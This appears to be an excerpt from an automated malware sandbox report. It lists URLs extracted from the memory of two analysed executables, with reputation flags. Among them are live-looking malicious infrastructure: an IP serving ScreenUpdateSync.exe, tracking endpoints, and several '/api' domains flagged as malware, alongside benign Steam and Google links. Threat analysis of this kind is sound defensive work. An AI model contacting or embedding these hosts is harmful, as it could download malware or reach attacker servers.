                                                                    https://store.steampowered.com/subscriber_agreement/1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.gstatic.cn/recaptcha/1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://wrathful-jammy.cyou/api1A68.tmp.exe, 00000003.00000002.2433686824.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.000000000093D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        http://176.113.115.19/ScreenUpdateSync.exerHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000002.4623211072.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000002.4623107198.0000000000A36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://176.113.115.19/ScreenUpdateSync.exefrHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.valvesoftware.com/legal.htm1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.youtube.com1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.google.com1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://176.113.115.19/ScreenUpdateSync.exef3rHrG691f7q.exe, 00000000.00000003.4485117055.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000002.4623211072.0000000000AA7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://deafeninggeh.biz/z1A68.tmp.exe, 00000003.00000003.2327414310.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.000000000093D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  		unknown
                                                                                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433836788.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af61A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://wrathful-jammy.cyou/~1A68.tmp.exe, 00000003.00000002.2433686824.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.000000000093D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://effecterectz.xyz/apiS1A68.tmp.exe, 00000003.00000003.2327414310.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.000000000093D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://diffuculttan.xyz/api1A68.tmp.exe, 00000003.00000003.2373734520.0000000000932000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000930000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.0000000000933000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                https://s.ytimg.com;1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=11A68.tmp.exe, 00000003.00000002.2433623776.0000000000905000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://176.113.115.19/rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://community.fastly.steamstatic.com/1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://steam.tv/1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://176.113.115.19/ScreenUpdateSync.exeo3rHrG691f7q.exe, 00000000.00000003.4485117055.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000002.4623211072.0000000000AA7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://awake-weaves.cyou/apiZ1A68.tmp.exe, 00000003.00000003.2373734520.0000000000932000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000930000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.0000000000933000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          		unknown
                                                                                                          https://post-to-me.com/track_prt.php?sub=&cc=DErHrG691f7q.exe, 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                            		high
                                                                                                            https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://store.steampowered.com/privacy_agreement/1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://steamcommunity.com/j1A68.tmp.exe, 00000003.00000003.2373734520.0000000000932000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000930000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.0000000000933000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://store.steampowered.com/points/shop/1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://sketchfab.com1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://lv.queniujq.cn1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://deafeninggeh.biz/apiy1A68.tmp.exe, 00000003.00000003.2327414310.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.000000000093D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              		unknown
                                                                                                                              https://steamcommunity.com/profiles/76561199724331900/inventory/1A68.tmp.exe, 00000003.00000002.2433623776.0000000000905000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.youtube.com/1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://store.steampowered.com/privacy_agreement/1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://post-to-me.com/track_prt.php?sub=rHrG691f7q.exefalse
                                                                                                                                        		high
                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://www.google.com/recaptcha/1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://checkout.steampowered.com/1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://post-to-me.com/rHrG691f7q.exe, 00000000.00000002.4623107198.0000000000A6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://post-to-me.com/track_prt.php?sub=0&cc=DENrHrG691f7q.exe, 00000000.00000002.4623107198.0000000000A36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                		unknown
                                                                                                                                                https://store.steampowered.com/;1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://store.steampowered.com/about/1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://steamcommunity.com/my/wishlist/1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://help.steampowered.com/en/1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://steamcommunity.com/market/1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://store.steampowered.com/news/1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://176.113.115.19/ScreenUpdateSync.exet3rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              		unknown
                                                                                                                                                              http://store.steampowered.com/subscriber_agreement/1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://recaptcha.net/recaptcha/;1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://steamcommunity.com/discussions/1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://store.steampowered.com/stats/1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://medal.tv1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://broadcast.st.dl.eccdnx.com1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://store.steampowered.com/steam_refunds/1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://steamcommunity.com/login/home/?goto=profiles%2F765611997243319001A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620161A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://steamcommunity.com/B1A68.tmp.exe, 00000003.00000003.2373734520.0000000000932000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000930000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.0000000000933000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://steamcommunity.com/workshop/1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
